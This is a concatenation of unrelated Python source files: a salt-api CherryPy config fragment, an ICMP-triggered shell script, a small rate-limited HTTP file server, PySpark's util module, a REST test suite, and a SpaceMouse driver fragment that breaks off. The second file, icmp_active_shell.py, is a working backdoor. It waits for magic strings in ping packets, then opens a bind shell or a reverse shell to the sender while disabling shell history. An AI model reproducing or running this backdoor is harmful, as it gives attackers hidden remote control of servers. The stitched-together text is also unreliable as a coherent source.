def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
if 'app' in self.apiopts:
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'engine.timeout_monitor.on': self.apiopts.get(
'expire_responses', True),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.cpstats.on': self.apiopts.get('collect_stats', False),
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if 'favicon' in self.apiopts:
conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
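# Illustrative sketch (an assumption, not necessarily how the salt-api daemon
# itself wires this up) of serving the triple returned by get_app() directly
# with CherryPy; `master_opts` stands in for a loaded Salt master config dict.
#
#   import cherrypy
#   root, apiopts, cpyopts = get_app(master_opts)
#   cherrypy.quickstart(root, apiopts.get('root_prefix', '/'), cpyopts)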
|
icmp_active_shell.py
|
'''
Sniffs ICMP ECHO REQUEST packets to activate a shell on the server.
OS: Linux
Tiago Martins (tiago.tsmweb@gmail.com)
'''
import socket
import sys
import os
import pty
import threading
from struct import *
PORT = 42444
ICMP_ECHO_REQUEST = 8
def open_shell():
try:
# Create socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("", PORT))
sock.listen(1)
(cli, addr) = sock.accept()
# Save previous standard in, out, and error
oldInFd = os.dup(0)
oldOutFd = os.dup(1)
oldErrFd = os.dup(2)
# Redirect standard in, out, and error
os.dup2(cli.fileno(), 0)
os.dup2(cli.fileno(), 1)
os.dup2(cli.fileno(), 2)
# Open shell interactive
os.putenv("HISTFILE","/dev/null")
pty.spawn("/bin/bash")
# Close socket
sock.shutdown(socket.SHUT_RDWR)
sock.close()
# Restore standard in, out, and error
os.dup2(oldInFd, 0)
os.close(oldInFd)
os.dup2(oldOutFd, 1)
os.close(oldOutFd)
os.dup2(oldErrFd, 2)
os.close(oldErrFd)
except socket.error as msg:
print str(msg)
sys.exit()
def open_reverse_shell(dest_address):
try:
# Create socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Save previous standard in, out, and error
oldInFd = os.dup(0)
oldOutFd = os.dup(1)
oldErrFd = os.dup(2)
# Connect socket
sock.connect((dest_address, PORT))
# Redirect standard in, out, and error
os.dup2(sock.fileno(), 0)
os.dup2(sock.fileno(), 1)
os.dup2(sock.fileno(), 2)
# Open shell interactive
os.putenv("HISTFILE","/dev/null")
pty.spawn("/bin/bash")
# Close socket
sock.shutdown(socket.SHUT_RDWR)
sock.close()
# Restore standard in, out, and error
os.dup2(oldInFd, 0)
os.close(oldInFd)
os.dup2(oldOutFd, 1)
os.close(oldOutFd)
os.dup2(oldErrFd, 2)
os.close(oldErrFd)
except socket.error as msg:
print str(msg)
sys.exit()
def main():
try:
# Create socket raw - icmp
sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
except socket.error , msg:
print "[!] Socket could not be created. Error Code : " + str(msg[0]) + " Message " + msg[1]
sys.exit()
while True:
packet = sock.recvfrom(65565)[0]
# IP packet
ip_header = packet[0:20]
iph = unpack("!BBHHHBBH4s4s", ip_header)
version_ihl = iph[0]
version = version_ihl >> 4
ihl = version_ihl & 0xF
iph_length = ihl * 4
ttl = iph[5]
protocol = iph[6]
s_addr = socket.inet_ntoa(iph[8])
d_addr = socket.inet_ntoa(iph[9])
# ICMP packet
icmph_length = 4
icmp_header = packet[iph_length:iph_length+icmph_length]
icmph = unpack("!BBH", icmp_header)
icmp_type = icmph[0]
icmp_code = icmph[1]
icmp_checksum = icmph[2]
if icmp_type == ICMP_ECHO_REQUEST:
# PAYLOAD
h_size = iph_length + icmph_length
data = packet[h_size:]
if "-*-ias-*-" in str(data).lower():
print "[>] Open shell in: " + str(s_addr)
bs_thread = threading.Thread(target=open_shell, args=())
bs_thread.start()
elif "-*-iars-*-" in str(data).lower():
print "[>] Open reverse shell in: " + str(s_addr)
brs_thread = threading.Thread(target=open_reverse_shell, args=(str(s_addr),))
brs_thread.start()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
pass
|
server.py
|
import socket
import sys
import os, stat
import threading
import time
import json
from Queue import Queue
directory = "Upload"
cookie_key = "id"
banned_ips = set()
cookie_count = 0
client_ip_addr_map = {}
cookie_last_number_visit_map = {}
lock = threading.Lock()
def get_file_type(file_name):
if file_name.endswith(".jpg"):
mimetype = 'image/jpg'
elif file_name.endswith(".png"):
mimetype = 'image/png'
else:
mimetype = 'text/html'
return mimetype
def get_cookie_header(cookie_value):
if cookie_last_number_visit_map.has_key(cookie_value):
cookie_dictionary = cookie_last_number_visit_map[cookie_value]
visit_count = cookie_dictionary['count']
cookie_dictionary['count'] = visit_count+1
cookie_dictionary['last_visit'] = time.ctime(time.time())
else:
cookie_dictionary = {'count': 1, 'last_visit': time.ctime(time.time())}
cookie_last_number_visit_map[cookie_value] = cookie_dictionary
cookie_header = "Set-Cookie: your_identifier=" + str(cookie_value)
return cookie_header
def parse(request):
global cookie_count
response_code = '400 Bad Request'
http_version = 'HTTP/1.0'
response_headers = ''
headers = request.splitlines()
cookie_value = None
for header in headers:
cookie_fields = header.split(':')
if cookie_fields[0] == 'Cookie':
cookie_value = cookie_fields[1].split('=')[1].strip()
if cookie_value is None:
with lock:
# print "lock acquired for initializing cookie"
cookie_value = cookie_count
cookie_count += 1
# time.sleep(2)
header_fields = headers[0].split(' ')
request_type = header_fields[0].strip()
if request_type != "GET" and request_type != 'HEAD':
raise Exception('Unknown request type method')
if header_fields[1] == '/':
file_name = directory + "/index.html"
else:
file_name = directory + header_fields[1]
http_version = header_fields[2]
response_code = '200 OK'
content_length = None
file_content = None
with lock:
# print "lock acquired for updating cookie map"
cookie_header = get_cookie_header(cookie_value)
# time.sleep(2)
try:
if os.path.isfile(file_name):
accessCode = oct(stat.S_IMODE(os.stat(file_name).st_mode))
global_permission = int(accessCode[3])
if global_permission < 4:
raise Exception('File does not have read permission to public')
content_length = os.path.getsize(file_name)
mimetype = get_file_type(file_name)
if request_type == 'GET':
with open(file_name, mode = 'rb') as file:
file_content = file.read()
else:
response_code = '404 NOT FOUND'
except Exception, e:
response_code = '403 FORBIDDEN'
response_header1 = http_version + ' ' + response_code
response_headers += response_header1
if content_length is not None:
response_header2 = "Content-Length: " + str(content_length)
response_headers += '\n' + response_header2
response_header3 = 'Content-Type: ' + mimetype
response_headers += '\n' + response_header3
response_headers += '\n' + cookie_header
date_header = "\nDate: " + str(time.ctime(time.time()))
if file_content is None:
response_headers += date_header
return response_headers + '\n'
response_headers += date_header
return response_headers + '\n\n' + file_content + '\n'
def listen_to_client(connection, client_addr):
print "request from client ip addr is ", client_addr
request = ''
request = connection.recv(4096)
try:
response = parse(request)
except Exception, e:
# print e
response = "HTTP/1.0 400 Bad Request\n"
connection.send(response)
connection.close()
def send_429_response(connection, client_ip):
print client_ip, " is banned"
response = "HTTP/1.0 429 TOO MANY REQUESTS"
connection.send(response)
connection.close()
def main(argv):
s = socket.socket()
port = 12345
if len(argv) != 0:
port = int(argv[0])
print "listening at port ", port
s.bind(('', port))
s.listen(5)
while True:
connection, client_addr = s.accept()
client_ip = client_addr[0]
'''
check whether the client is already banned
'''
if client_ip in banned_ips:
send_429_response(connection, client_ip)
continue
'''
if the client is not banned yet, check whether this is more than its 100th request in the last minute
'''
if client_ip_addr_map.has_key(client_ip):
timestamp_queue = client_ip_addr_map[client_ip]
else:
timestamp_queue = Queue()
client_ip_addr_map[client_ip] = timestamp_queue
ts = int(time.time())
if timestamp_queue.qsize() == 100:
last_timestamp = timestamp_queue.get()
#this checks if the client can be banned or not
time_difference = ts - last_timestamp
# print "time difference is ", time_difference
if time_difference <= 60:
banned_ips.add(client_ip)
send_429_response(connection, client_ip)
continue
timestamp_queue.put(ts)
'''
if client is not banned, then serve the request in a new thread
'''
threading.Thread(target = listen_to_client, args = (connection, client_addr)).start()
if __name__ == '__main__':
try:
if os.path.isfile('cookies.json'):
with open('cookies.json') as fp:
json_dump = json.loads(fp.read())
if len(json_dump) == 2:
cookie_count = json_dump['cookie_count']
cookie_last_number_visit_map = json_dump['cookie_dictionary']
main(sys.argv[1:])
except KeyboardInterrupt:
with open('cookies.json', 'wb') as fp:
json_dump = {'cookie_count':cookie_count, 'cookie_dictionary':cookie_last_number_visit_map}
json.dump(json_dump, fp)
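# Illustrative standalone sketch (not used by the server above) of the
# queue-based rate check performed in main(): a client is banned once a new
# request arrives while its 100th-most-recent request is under 60 seconds old.
#
#   from Queue import Queue
#   import time
#
#   def should_ban(timestamp_queue, now, limit=100, window=60):
#       if timestamp_queue.qsize() == limit:
#           oldest = timestamp_queue.get()
#           if now - oldest <= window:
#               return True
#       timestamp_queue.put(now)
#       return False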
|
util.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import functools
import itertools
import os
import platform
import re
import sys
import threading
import traceback
import types
try:
from collections.abc import Callable
except ImportError:
from collections import Callable
from py4j.clientserver import ClientServer
__all__ = [] # type: ignore
def print_exec(stream):
ei = sys.exc_info()
traceback.print_exception(ei[0], ei[1], ei[2], None, stream)
class VersionUtils(object):
"""
Provides utility method to determine Spark versions with given input string.
"""
@staticmethod
def majorMinorVersion(sparkVersion: str):
"""
Given a Spark version string, return the (major version number, minor version number).
E.g., for 2.0.1-SNAPSHOT, return (2, 0).
Examples
--------
>>> sparkVersion = "2.4.0"
>>> VersionUtils.majorMinorVersion(sparkVersion)
(2, 4)
>>> sparkVersion = "2.3.0-SNAPSHOT"
>>> VersionUtils.majorMinorVersion(sparkVersion)
(2, 3)
"""
m = re.search(r'^(\d+)\.(\d+)(\..*)?$', sparkVersion)
if m is not None:
return (int(m.group(1)), int(m.group(2)))
else:
raise ValueError("Spark tried to parse '%s' as a Spark" % sparkVersion +
" version string, but it could not find the major and minor" +
" version numbers.")
def fail_on_stopiteration(f):
"""
Wraps the input function to fail on 'StopIteration' by raising a 'RuntimeError';
this prevents silent loss of data when 'f' is used in a for loop in Spark code.
"""
def wrapper(*args, **kwargs):
try:
return f(*args, **kwargs)
except StopIteration as exc:
raise RuntimeError(
"Caught StopIteration thrown from user's code; failing the task",
exc
)
return wrapper
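# Illustrative sketch of the failure mode fail_on_stopiteration() guards
# against: a StopIteration escaping user code would otherwise silently end the
# surrounding loop instead of failing the task. `bad_udf` is a hypothetical
# example function.
#
#   def bad_udf(x):
#       raise StopIteration  # silently truncates results without the wrapper
#
#   wrapped = fail_on_stopiteration(bad_udf)
#   # wrapped(1) now raises RuntimeError instead of StopIteration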
def walk_tb(tb):
while tb is not None:
yield tb
tb = tb.tb_next
def try_simplify_traceback(tb):
"""
Simplify the traceback. It removes the tracebacks in the current package, and only
shows the traceback that is related to third-party and user-specified code.
Returns
-------
TracebackType or None
Simplified traceback instance. It returns None if it fails to simplify.
Notes
-----
This keeps the tracebacks once it sees they are from a different file even
though the following tracebacks are from the current package.
Examples
--------
>>> import importlib
>>> import sys
>>> import traceback
>>> import tempfile
>>> with tempfile.TemporaryDirectory() as tmp_dir:
... with open("%s/dummy_module.py" % tmp_dir, "w") as f:
... _ = f.write(
... 'def raise_stop_iteration():\\n'
... ' raise StopIteration()\\n\\n'
... 'def simple_wrapper(f):\\n'
... ' def wrapper(*a, **k):\\n'
... ' return f(*a, **k)\\n'
... ' return wrapper\\n')
... f.flush()
... spec = importlib.util.spec_from_file_location(
... "dummy_module", "%s/dummy_module.py" % tmp_dir)
... dummy_module = importlib.util.module_from_spec(spec)
... spec.loader.exec_module(dummy_module)
>>> def skip_doctest_traceback(tb):
... import pyspark
... root = os.path.dirname(pyspark.__file__)
... pairs = zip(walk_tb(tb), traceback.extract_tb(tb))
... for cur_tb, cur_frame in pairs:
... if cur_frame.filename.startswith(root):
... return cur_tb
Regular exceptions should show the file name of the current package as below.
>>> exc_info = None
>>> try:
... fail_on_stopiteration(dummy_module.raise_stop_iteration)()
... except Exception as e:
... tb = sys.exc_info()[-1]
... e.__cause__ = None
... exc_info = "".join(
... traceback.format_exception(type(e), e, tb))
>>> print(exc_info) # doctest: +NORMALIZE_WHITESPACE, +ELLIPSIS
Traceback (most recent call last):
File ...
...
File "/.../pyspark/util.py", line ...
...
RuntimeError: ...
>>> "pyspark/util.py" in exc_info
True
If the traceback is simplified with this method, it hides the current package file name:
>>> exc_info = None
>>> try:
... fail_on_stopiteration(dummy_module.raise_stop_iteration)()
... except Exception as e:
... tb = try_simplify_traceback(sys.exc_info()[-1])
... e.__cause__ = None
... exc_info = "".join(
... traceback.format_exception(
... type(e), e, try_simplify_traceback(skip_doctest_traceback(tb))))
>>> print(exc_info) # doctest: +NORMALIZE_WHITESPACE, +ELLIPSIS
RuntimeError: ...
>>> "pyspark/util.py" in exc_info
False
In the case below, the traceback contains the current package in the middle.
In this case, it just hides the top occurrence only.
>>> exc_info = None
>>> try:
... fail_on_stopiteration(dummy_module.simple_wrapper(
... fail_on_stopiteration(dummy_module.raise_stop_iteration)))()
... except Exception as e:
... tb = sys.exc_info()[-1]
... e.__cause__ = None
... exc_info_a = "".join(
... traceback.format_exception(type(e), e, tb))
... exc_info_b = "".join(
... traceback.format_exception(
... type(e), e, try_simplify_traceback(skip_doctest_traceback(tb))))
>>> exc_info_a.count("pyspark/util.py")
2
>>> exc_info_b.count("pyspark/util.py")
1
"""
if "pypy" in platform.python_implementation().lower():
# Traceback modification is not supported with PyPy in PySpark.
return None
if sys.version_info[:2] < (3, 7):
# Traceback creation is not supported in Python < 3.7.
# See https://bugs.python.org/issue30579.
return None
import pyspark
root = os.path.dirname(pyspark.__file__)
tb_next = None
new_tb = None
pairs = zip(walk_tb(tb), traceback.extract_tb(tb))
last_seen = []
for cur_tb, cur_frame in pairs:
if not cur_frame.filename.startswith(root):
# Filter the stacktrace from the PySpark source itself.
last_seen = [(cur_tb, cur_frame)]
break
for cur_tb, cur_frame in reversed(list(itertools.chain(last_seen, pairs))):
# Once we have seen the file names outside, don't skip.
new_tb = types.TracebackType(
tb_next=tb_next,
tb_frame=cur_tb.tb_frame,
tb_lasti=cur_tb.tb_frame.f_lasti,
tb_lineno=cur_tb.tb_frame.f_lineno if cur_tb.tb_frame.f_lineno is not None else -1)
tb_next = new_tb
return new_tb
def _print_missing_jar(lib_name, pkg_name, jar_name, spark_version):
print("""
________________________________________________________________________________________________
Spark %(lib_name)s libraries not found in class path. Try one of the following.
1. Include the %(lib_name)s library and its dependencies in the
spark-submit command as
$ bin/spark-submit --packages org.apache.spark:spark-%(pkg_name)s:%(spark_version)s ...
2. Download the JAR of the artifact from Maven Central http://search.maven.org/,
Group Id = org.apache.spark, Artifact Id = spark-%(jar_name)s, Version = %(spark_version)s.
Then, include the jar in the spark-submit command as
$ bin/spark-submit --jars <spark-%(jar_name)s.jar> ...
________________________________________________________________________________________________
""" % {
"lib_name": lib_name,
"pkg_name": pkg_name,
"jar_name": jar_name,
"spark_version": spark_version
})
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MiB
Examples
--------
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def inheritable_thread_target(f: Callable) -> Callable:
"""
Return a thread target wrapper recommended for use in PySpark when the
pinned thread mode is enabled. Before calling the original thread target, the
wrapper inherits the inheritable properties specific to the JVM thread,
such as ``InheritableThreadLocal``.
Also, note that pinned thread mode does not close the connection from Python
to the JVM when the thread finishes on the Python side. With this wrapper, Python
garbage-collects the Python thread instance and also closes the connection,
which finishes the JVM thread correctly.
When the pinned thread mode is off, it returns the original ``f``.
.. versionadded:: 3.2.0
Parameters
----------
f : function
the original thread target.
Notes
-----
This API is experimental.
It is important to know that it captures the local properties when you decorate it
whereas :class:`InheritableThread` captures when the thread is started.
Therefore, it is encouraged to decorate it when you want to capture the local
properties.
For example, the local properties from the current Spark context are captured
when you define a function here, rather than at the time of invocation:
>>> @inheritable_thread_target
... def target_func():
... pass # your codes.
If you update the local properties afterwards, the change will not be reflected in
the Spark context in ``target_func()``.
The example below mimics the behavior of JVM threads as closely as possible:
>>> Thread(target=inheritable_thread_target(target_func)).start() # doctest: +SKIP
"""
from pyspark import SparkContext
if isinstance(SparkContext._gateway, ClientServer): # type: ignore[attr-defined]
# Here's when the pinned-thread mode (PYSPARK_PIN_THREAD) is on.
# NOTICE the internal difference vs `InheritableThread`. `InheritableThread`
# copies local properties when the thread starts but `inheritable_thread_target`
# copies when the function is wrapped.
properties = (SparkContext
._active_spark_context # type: ignore[attr-defined]
._jsc.sc()
.getLocalProperties().clone())
@functools.wraps(f)
def wrapped(*args, **kwargs):
try:
# Set local properties in child thread.
SparkContext._active_spark_context._jsc.sc().setLocalProperties(properties)
return f(*args, **kwargs)
finally:
InheritableThread._clean_py4j_conn_for_current_thread()
return wrapped
else:
return f
class InheritableThread(threading.Thread):
"""
Thread that is recommended to be used in PySpark instead of :class:`threading.Thread`
when the pinned thread mode is enabled. The usage of this class is exactly the same
as :class:`threading.Thread`, but it correctly inherits the inheritable properties
specific to the JVM thread, such as ``InheritableThreadLocal``.
Also, note that pinned thread mode does not close the connection from Python
to the JVM when the thread finishes on the Python side. With this class, Python
garbage-collects the Python thread instance and also closes the connection,
which finishes the JVM thread correctly.
When the pinned thread mode is off, this works as :class:`threading.Thread`.
.. versionadded:: 3.1.0
Notes
-----
This API is experimental.
"""
def __init__(self, target, *args, **kwargs):
from pyspark import SparkContext
if isinstance(SparkContext._gateway, ClientServer):
# Here's when the pinned-thread mode (PYSPARK_PIN_THREAD) is on.
def copy_local_properties(*a, **k):
# self._props is set before starting the thread to match the behavior with JVM.
assert hasattr(self, "_props")
SparkContext._active_spark_context._jsc.sc().setLocalProperties(self._props)
try:
return target(*a, **k)
finally:
InheritableThread._clean_py4j_conn_for_current_thread()
super(InheritableThread, self).__init__(
target=copy_local_properties, *args, **kwargs)
else:
super(InheritableThread, self).__init__(target=target, *args, **kwargs)
def start(self, *args, **kwargs):
from pyspark import SparkContext
if isinstance(SparkContext._gateway, ClientServer):
# Here's when the pinned-thread mode (PYSPARK_PIN_THREAD) is on.
# Local property copy should happen in Thread.start to mimic JVM's behavior.
self._props = SparkContext._active_spark_context._jsc.sc().getLocalProperties().clone()
return super(InheritableThread, self).start(*args, **kwargs)
@staticmethod
def _clean_py4j_conn_for_current_thread():
from pyspark import SparkContext
jvm = SparkContext._jvm
thread_connection = jvm._gateway_client.get_thread_connection()
if thread_connection is not None:
try:
# Dequeue is shared across other threads but it's thread-safe.
# If this function has to be invoked one more time in the same thread
# Py4J will create a new connection automatically.
jvm._gateway_client.deque.remove(thread_connection)
except ValueError:
# Should never reach this point
return
finally:
thread_connection.close()
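# Illustrative sketch (hypothetical, assumes an active SparkContext ``sc``):
# InheritableThread copies the parent's local properties in ``start()``, so a
# property set before ``start()`` is visible inside the thread when pinned
# thread mode is enabled.
def _demo_inheritable_thread(sc):
    sc.setLocalProperty("spark.scheduler.pool", "demo_pool")
    t = InheritableThread(
        target=lambda: print(sc.getLocalProperty("spark.scheduler.pool")))
    t.start()  # local properties are cloned here, mimicking JVM behavior
    t.join()   # prints "demo_pool"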
if __name__ == "__main__":
if "pypy" not in platform.python_implementation().lower() and sys.version_info[:2] >= (3, 7):
import doctest
import pyspark.util
from pyspark.context import SparkContext
globs = pyspark.util.__dict__.copy()
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(pyspark.util, globs=globs)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
|
test_application.py
|
#
# This file is part of Python-REST. Python-REST is free software that is
# made available under the MIT license. Consult the file "LICENSE" that is
# distributed together with this file for the exact licensing terms.
#
# Python-REST is copyright (c) 2010 by the Python-REST authors. See the file
# "AUTHORS" for a complete overview.
import sys
import time
import logging
import httplib as http
from threading import Thread
from httplib import HTTPConnection
from xml.etree import ElementTree as etree
from xml.etree.ElementTree import XML, Element
from rest import Application, Collection, Resource
from rest.api import request, response, mapper
from rest.server import make_server
class BookCollection(Collection):
name = 'books'
contains = 'book'
entity_transform = """
$!type <=> $!type
$id:int <=> $id
$title <=> $title
$reviews <= $reviews
"""
def __init__(self):
self.books = []
self.books.append(Resource('book', { 'id': '1', 'title': 'Book Number 1' } ))
        self.books.append(Resource('book', { 'id': '2', 'title': 'Book Number 2' } ))
        self.books.append(Resource('book', { 'id': '3', 'title': 'Book Number 3' } ))
def _get_book(self, id):
for book in self.books:
if book['id'] == id:
return book
def show(self, id):
book = self._get_book(id)
if not book:
raise KeyError
return book
def list(self, **kwargs):
match = []
id = kwargs.get('id')
detail = kwargs.get('detail')
for book in self.books:
if id and book['id'] != id:
continue
book = book.copy()
if detail == '2':
book['reviews'] = [Resource('review',
{ 'comment': 'Very good' })]
match.append(book)
return match
def create(self, input):
self.books.append(input)
url = mapper.url_for(collection=self.name, action='show',
id=input['id'])
return url
def update(self, id, input):
book = self._get_book(id)
if not book:
raise KeyError
book.update(input)
def delete(self, id):
book = self._get_book(id)
if not book:
raise KeyError
self.books.remove(book)
class BookApplication(Application):
def setup_collections(self):
self.add_collection(BookCollection())
class TestApplication(object):
@classmethod
def setUpClass(cls):
# Make sure we get some logs on standard output.
level = logging.DEBUG
logger = logging.getLogger('rest')
handler = logging.StreamHandler(sys.stdout)
format = '%(levelname)s [%(name)s] %(message)s'
formatter = logging.Formatter(format)
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(level)
def setUp(self):
self.server = make_server('localhost', 0, BookApplication)
# don't want any logging
self.server.RequestHandlerClass.log_request = lambda *args: None
self.thread = Thread(target=self.server.serve_forever)
self.thread.start()
time.sleep(0.5) # make sure server is started up
address = self.server.socket.getsockname()
self.client = HTTPConnection(*address)
def tearDown(self):
self.server.shutdown()
self.thread.join()
def test_show(self):
client = self.client
client.request('GET', '/api/books/1')
response = client.getresponse()
assert response.status == http.OK
assert response.getheader('Content-Type') == 'text/xml; charset=utf-8'
xml = etree.fromstring(response.read())
assert etree.tostring(xml) == \
'<book>\n <id>1</id>\n <title>Book Number 1</title>\n</book>'
def test_show_not_found(self):
client = self.client
client.request('GET', '/api/books/4')
response = client.getresponse()
assert response.status == http.NOT_FOUND
def test_show_with_input(self):
client = self.client
client.request('GET', '/api/books/1', 'body input')
response = client.getresponse()
assert response.status == http.BAD_REQUEST
def test_list(self):
client = self.client
client.request('GET', '/api/books')
response = client.getresponse()
assert response.status == http.OK
assert response.getheader('Content-Type') == 'text/xml; charset=utf-8'
xml = etree.fromstring(response.read())
assert len(xml.findall('.//id')) == 3
def test_list_with_input(self):
client = self.client
client.request('GET', '/api/books', 'body input')
response = client.getresponse()
assert response.status == http.BAD_REQUEST
def test_list_with_filter(self):
client = self.client
client.request('GET', '/api/books?id=2')
response = client.getresponse()
assert response.status == http.OK
assert response.getheader('Content-Type') == 'text/xml; charset=utf-8'
xml = etree.fromstring(response.read())
assert len(xml.findall('.//id')) == 1
def test_create(self):
client = self.client
book = XML('<book><id>4</id><title>Book Number 4</title></book>')
headers = { 'Content-Type': 'text/xml' }
client.request('POST', '/api/books', etree.tostring(book), headers)
response = client.getresponse()
assert response.status == http.CREATED
assert response.getheader('Location').endswith('/api/books/4')
def test_create_no_input(self):
client = self.client
client.request('POST', '/api/books')
response = client.getresponse()
assert response.status == http.BAD_REQUEST
def test_create_wrong_content_type(self):
client = self.client
book = '<book><id>4</id><title>Book Number 4</title></book>'
headers = { 'Content-Type': 'text/plain' }
client.request('POST', '/api/books', book, headers)
response = client.getresponse()
assert response.status == http.UNSUPPORTED_MEDIA_TYPE
def test_delete(self):
client = self.client
client.request('DELETE', '/api/books/1')
response = client.getresponse()
assert response.status == http.NO_CONTENT
def test_delete_non_existent(self):
client = self.client
client.request('DELETE', '/api/books/4')
response = client.getresponse()
assert response.status == http.NOT_FOUND
def test_delete_with_input(self):
client = self.client
client.request('DELETE', '/api/books/4', 'input')
response = client.getresponse()
assert response.status == http.BAD_REQUEST
def test_update(self):
client = self.client
book = XML('<book><id>1</id><title>Book Number 2</title></book>')
headers = { 'Content-Type': 'text/xml' }
client.request('PUT', '/api/books/1', etree.tostring(book), headers)
response = client.getresponse()
assert response.status == http.NO_CONTENT
def test_update_without_input(self):
client = self.client
headers = { 'Content-Type': 'text/xml' }
client.request('PUT', '/api/books/1', '', headers)
response = client.getresponse()
assert response.status == http.BAD_REQUEST
def test_update_with_wrong_content_type(self):
client = self.client
book = '<book><id>1</id><title>Book Number 2</title></book>'
headers = { 'Content-Type': 'text/plain' }
client.request('PUT', '/api/books/1', book, headers)
response = client.getresponse()
assert response.status == http.UNSUPPORTED_MEDIA_TYPE
def test_update_non_existent(self):
client = self.client
book = XML('<book><id>1</id><title>Book Number 2</title></book>')
headers = { 'Content-Type': 'text/xml' }
client.request('PUT', '/api/books/4', etree.tostring(book), headers)
response = client.getresponse()
assert response.status == http.NOT_FOUND
def test_wrong_methods(self):
client = self.client
client.request('PUT', '/api/books')
response = client.getresponse()
assert response.status == http.METHOD_NOT_ALLOWED
allowed = set(response.getheader('Allowed').split(', '))
assert allowed == set(['GET', 'POST'])
client.request('DELETE', '/api/books')
response = client.getresponse()
assert response.status == http.METHOD_NOT_ALLOWED
allowed = set(response.getheader('Allowed').split(', '))
assert allowed == set(['GET', 'POST'])
client.request('POST', '/api/books/1')
response = client.getresponse()
assert response.status == http.METHOD_NOT_ALLOWED
allowed = set(response.getheader('Allowed').split(', '))
assert allowed == set(['GET', 'DELETE', 'PUT'])
|
spacemouse.py
|
"""Driver class for SpaceMouse controller.
This class provides a driver support to SpaceMouse on Mac OS X.
In particular, we assume you are using a SpaceMouse Wireless by default.
To set up a new SpaceMouse controller:
1. Download and install driver from https://www.3dconnexion.com/service/drivers.html
2. Install the hidapi library through pip
   (make sure you run pip uninstall hid first if it is installed).
3. Make sure SpaceMouse is connected before running the script
4. (Optional) Based on the model of SpaceMouse, you might need to change the
vendor id and product id that correspond to the device.
For Linux support, you can find open-source Linux drivers and SDKs online.
See http://spacenav.sourceforge.net/
"""
import time
import threading
from collections import namedtuple
import numpy as np
try:
import hid
except ModuleNotFoundError as exc:
raise ImportError("Unable to load module hid, required to interface with SpaceMouse. "
"Only Mac OS X is officially supported. Install the additional "
"requirements with `pip install -r requirements-ik.txt`") from exc
from ..utils.transform_utils import rotation_matrix
from . import Device
AxisSpec = namedtuple("AxisSpec", ["channel", "byte1", "byte2", "scale"])
SPACE_MOUSE_SPEC = {
"x": AxisSpec(channel=1, byte1=1, byte2=2, scale=1),
"y": AxisSpec(channel=1, byte1=3, byte2=4, scale=-1),
"z": AxisSpec(channel=1, byte1=5, byte2=6, scale=-1),
"roll": AxisSpec(channel=1, byte1=7, byte2=8, scale=-1),
"pitch": AxisSpec(channel=1, byte1=9, byte2=10, scale=-1),
"yaw": AxisSpec(channel=1, byte1=11, byte2=12, scale=1),
}
def to_int16(y1, y2):
"""Convert two 8 bit bytes to a signed 16 bit integer."""
x = (y1) | (y2 << 8)
if x >= 32768:
x = -(65536 - x)
return x
def scale_to_control(x, axis_scale=350., min_v=-1.0, max_v=1.0):
"""Normalize raw HID readings to target range."""
x = x / axis_scale
x = min(max(x, min_v), max_v)
return x
def convert(b1, b2):
"""Converts SpaceMouse message to commands."""
return scale_to_control(to_int16(b1, b2))
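# Worked example (illustrative only, not used by the driver): two raw HID bytes
# are combined little-endian into a signed 16-bit integer and then clamped and
# normalized into the [-1, 1] control range.
def _demo_axis_decoding():
    assert to_int16(0x10, 0x00) == 16        # low byte only
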